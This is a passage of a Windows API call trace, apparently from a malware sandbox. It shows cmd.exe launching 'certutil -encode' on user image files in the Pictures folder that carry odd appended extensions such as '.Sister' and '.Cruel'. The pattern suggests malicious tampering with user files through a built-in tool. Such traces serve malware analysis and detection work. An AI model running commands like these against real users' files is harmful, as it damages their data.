lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0297.772] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0297.772] GetProcessHeap () returned 0x21ed8c70000 [0297.772] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed8d65de0 [0297.772] GetProcessHeap () returned 0x21ed8c70000 [0297.772] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d42d70 [0297.772] GetProcessHeap () returned 0x21ed8c70000 [0297.772] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d42d70, Size=0x1c0) returned 0x21ed8d656a0 [0297.772] GetProcessHeap () returned 0x21ed8c70000 [0297.772] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d656a0) returned 0x1c0 [0297.772] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0297.772] GetProcessHeap () returned 0x21ed8c70000 [0297.772] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c7c670 [0297.773] GetProcessHeap () returned 0x21ed8c70000 [0297.773] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c670, Size=0x7e) returned 0x21ed8c7c670 [0297.773] GetProcessHeap () returned 0x21ed8c70000 [0297.773] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c670) returned 0x7e [0297.773] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.773] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0297.773] GetLastError () returned 0x2 [0297.773] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.774] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0297.775] GetLastError () returned 0x2 [0297.775] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.775] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ce20 [0297.775] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0297.775] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0297.775] GetLastError () returned 0x2 [0297.775] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ce80 [0297.776] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0297.776] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0297.776] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0297.776] ??_V@YAXPEAX@Z () returned 0x1 [0297.776] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0297.784] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0297.784] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0297.785] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0297.785] GetProcessHeap () returned 0x21ed8c70000 [0297.785] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45bf0 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0297.785] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0297.786] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0297.786] GetProcessHeap () returned 0x21ed8c70000 [0297.786] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bf0) returned 1 [0297.787] GetProcessHeap () returned 0x21ed8c70000 [0297.787] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95780 [0297.787] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0297.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0297.787] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0297.787] _get_osfhandle (_FileHandle=0) returned 0x4c [0297.787] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0297.788] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"F0Gamc8uxcBiM.png.Sister\" \"F0Gamc8uxcBiM.png.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"F0Gamc8uxcBiM.png.Sister\" \"F0Gamc8uxcBiM.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"F0Gamc8uxcBiM.png.Sister\" \"F0Gamc8uxcBiM.png.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe1c, dwThreadId=0xe0c)) returned 1 [0297.821] CloseHandle (hObject=0xa4) returned 1 [0297.821] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0297.821] GetProcessHeap () returned 0x21ed8c70000 [0297.821] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0297.821] GetEnvironmentStringsW () returned 0x21ed8d44630* [0297.821] GetProcessHeap () returned 0x21ed8c70000 [0297.821] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0297.821] FreeEnvironmentStringsA (penv="=") returned 1 [0297.821] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0298.324] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0298.324] CloseHandle (hObject=0xa8) returned 1 [0298.324] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0298.324] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0298.324] GetProcessHeap () returned 0x21ed8c70000 [0298.325] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0298.325] GetEnvironmentStringsW () returned 0x21ed8d44630* [0298.325] GetProcessHeap () returned 0x21ed8c70000 [0298.325] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0298.325] FreeEnvironmentStringsA (penv="=") returned 1 [0298.325] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0298.325] GetProcessHeap () returned 0x21ed8c70000 [0298.325] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0298.325] GetEnvironmentStringsW () returned 0x21ed8d44630* [0298.325] GetProcessHeap () returned 0x21ed8c70000 [0298.325] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0298.325] FreeEnvironmentStringsA (penv="=") returned 1 [0298.326] GetProcessHeap () returned 0x21ed8c70000 [0298.326] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95780) returned 1 [0298.326] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0298.326] ??_V@YAXPEAX@Z () returned 0x1 [0298.326] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32594d70, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x26a4bbe0, ftLastAccessTime.dwHighDateTime=0x1d5e9aa, ftLastWriteTime.dwLowDateTime=0x26a4bbe0, ftLastWriteTime.dwHighDateTime=0x1d5e9aa, nFileSizeHigh=0x0, nFileSizeLow=0x1623, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Gq9O pR9E.bmp.Sister", cAlternateFileName="")) returned 1 [0298.326] GetProcessHeap () returned 0x21ed8c70000 [0298.326] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6ae90, Size=0x168) returned 0x21ed8c95c40 [0298.326] GetProcessHeap () returned 0x21ed8c70000 [0298.326] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95c40) returned 0x168 [0298.326] GetProcessHeap () returned 0x21ed8c70000 [0298.326] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0130 [0298.326] GetProcessHeap () returned 0x21ed8c70000 [0298.326] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0130, Size=0x58) returned 0x21ed93b0130 [0298.326] GetProcessHeap () returned 0x21ed8c70000 [0298.327] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0130) returned 0x58 [0298.327] GetProcessHeap () returned 0x21ed8c70000 [0298.327] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b01a0 [0298.327] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0298.327] GetProcessHeap () returned 0x21ed8c70000 [0298.327] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bfd0 [0298.327] ??_V@YAXPEAX@Z () returned 0x1 [0298.327] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0298.327] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cc40 [0298.327] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0298.328] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ce20 [0298.328] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0298.328] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdc62ca3a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdc62ca3a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7d000 [0298.328] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0298.328] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Gq9O pR9E.bmp.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32594d70, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x26a4bbe0, ftLastAccessTime.dwHighDateTime=0x1d5e9aa, ftLastWriteTime.dwLowDateTime=0x26a4bbe0, ftLastWriteTime.dwHighDateTime=0x1d5e9aa, nFileSizeHigh=0x0, nFileSizeLow=0x1623, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Gq9O pR9E.bmp.Sister", cAlternateFileName="GQ9OPR~1.SIS")) returned 0x21ed8c7cf40 [0298.328] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0298.329] _wcsnicmp (_String1="GQ9OPR~1.SIS", _String2="Gq9O pR9E.bmp.Sister", _MaxCount=0x14) returned 80 [0298.329] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0298.329] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0298.329] GetProcessHeap () returned 0x21ed8c70000 [0298.329] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc8b90 [0298.329] ??_V@YAXPEAX@Z () returned 0x1 [0298.329] ??_V@YAXPEAX@Z () returned 0x1 [0298.329] GetProcessHeap () returned 0x21ed8c70000 [0298.329] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b01a0, Size=0x1c0) returned 0x21ed93b01a0 [0298.329] GetProcessHeap () returned 0x21ed8c70000 [0298.329] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b01a0) returned 0x1c0 [0298.329] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0298.329] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.329] GetFileType (hFile=0x50) returned 0x2 [0298.329] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.329] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0298.330] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.330] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0298.337] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0298.337] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0298.337] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0298.337] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0298.337] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.337] GetFileType (hFile=0x50) returned 0x2 [0298.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.337] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0298.338] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.338] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0298.338] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.338] GetFileType (hFile=0x50) returned 0x2 [0298.339] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.339] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0298.339] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.339] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b0140*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed93b0140*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0298.340] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"Gq9O pR9E.bmp.Sister\" \"Gq9O pR9E.bmp.Cruel\" ") returned 54 [0298.340] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.340] GetFileType (hFile=0x50) returned 0x2 [0298.340] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.340] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0298.340] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.340] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x36) returned 1 [0298.342] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0298.342] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.342] GetFileType (hFile=0x50) returned 0x2 [0298.342] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.342] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0298.343] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.343] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0298.348] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0298.349] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0298.349] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0298.349] malloc (_Size=0xffce) returned 0x21eda100000 [0298.349] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0298.349] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0298.349] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0298.349] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0298.349] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0298.349] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0298.349] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0298.349] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0298.349] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0298.349] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0298.349] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0298.349] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0298.349] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0298.349] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0298.349] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0298.349] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0298.349] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0298.350] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0298.350] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0298.350] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0298.350] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0298.350] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0298.350] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0298.350] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0298.350] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0298.350] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0298.350] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0298.350] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0298.350] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0298.350] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0298.352] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0298.352] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0298.352] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0298.352] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0298.352] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0298.352] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0298.352] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0298.352] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0298.352] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0298.352] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0298.352] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0298.352] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0298.352] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0298.352] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0298.352] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0298.352] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0298.352] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0298.352] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0298.352] 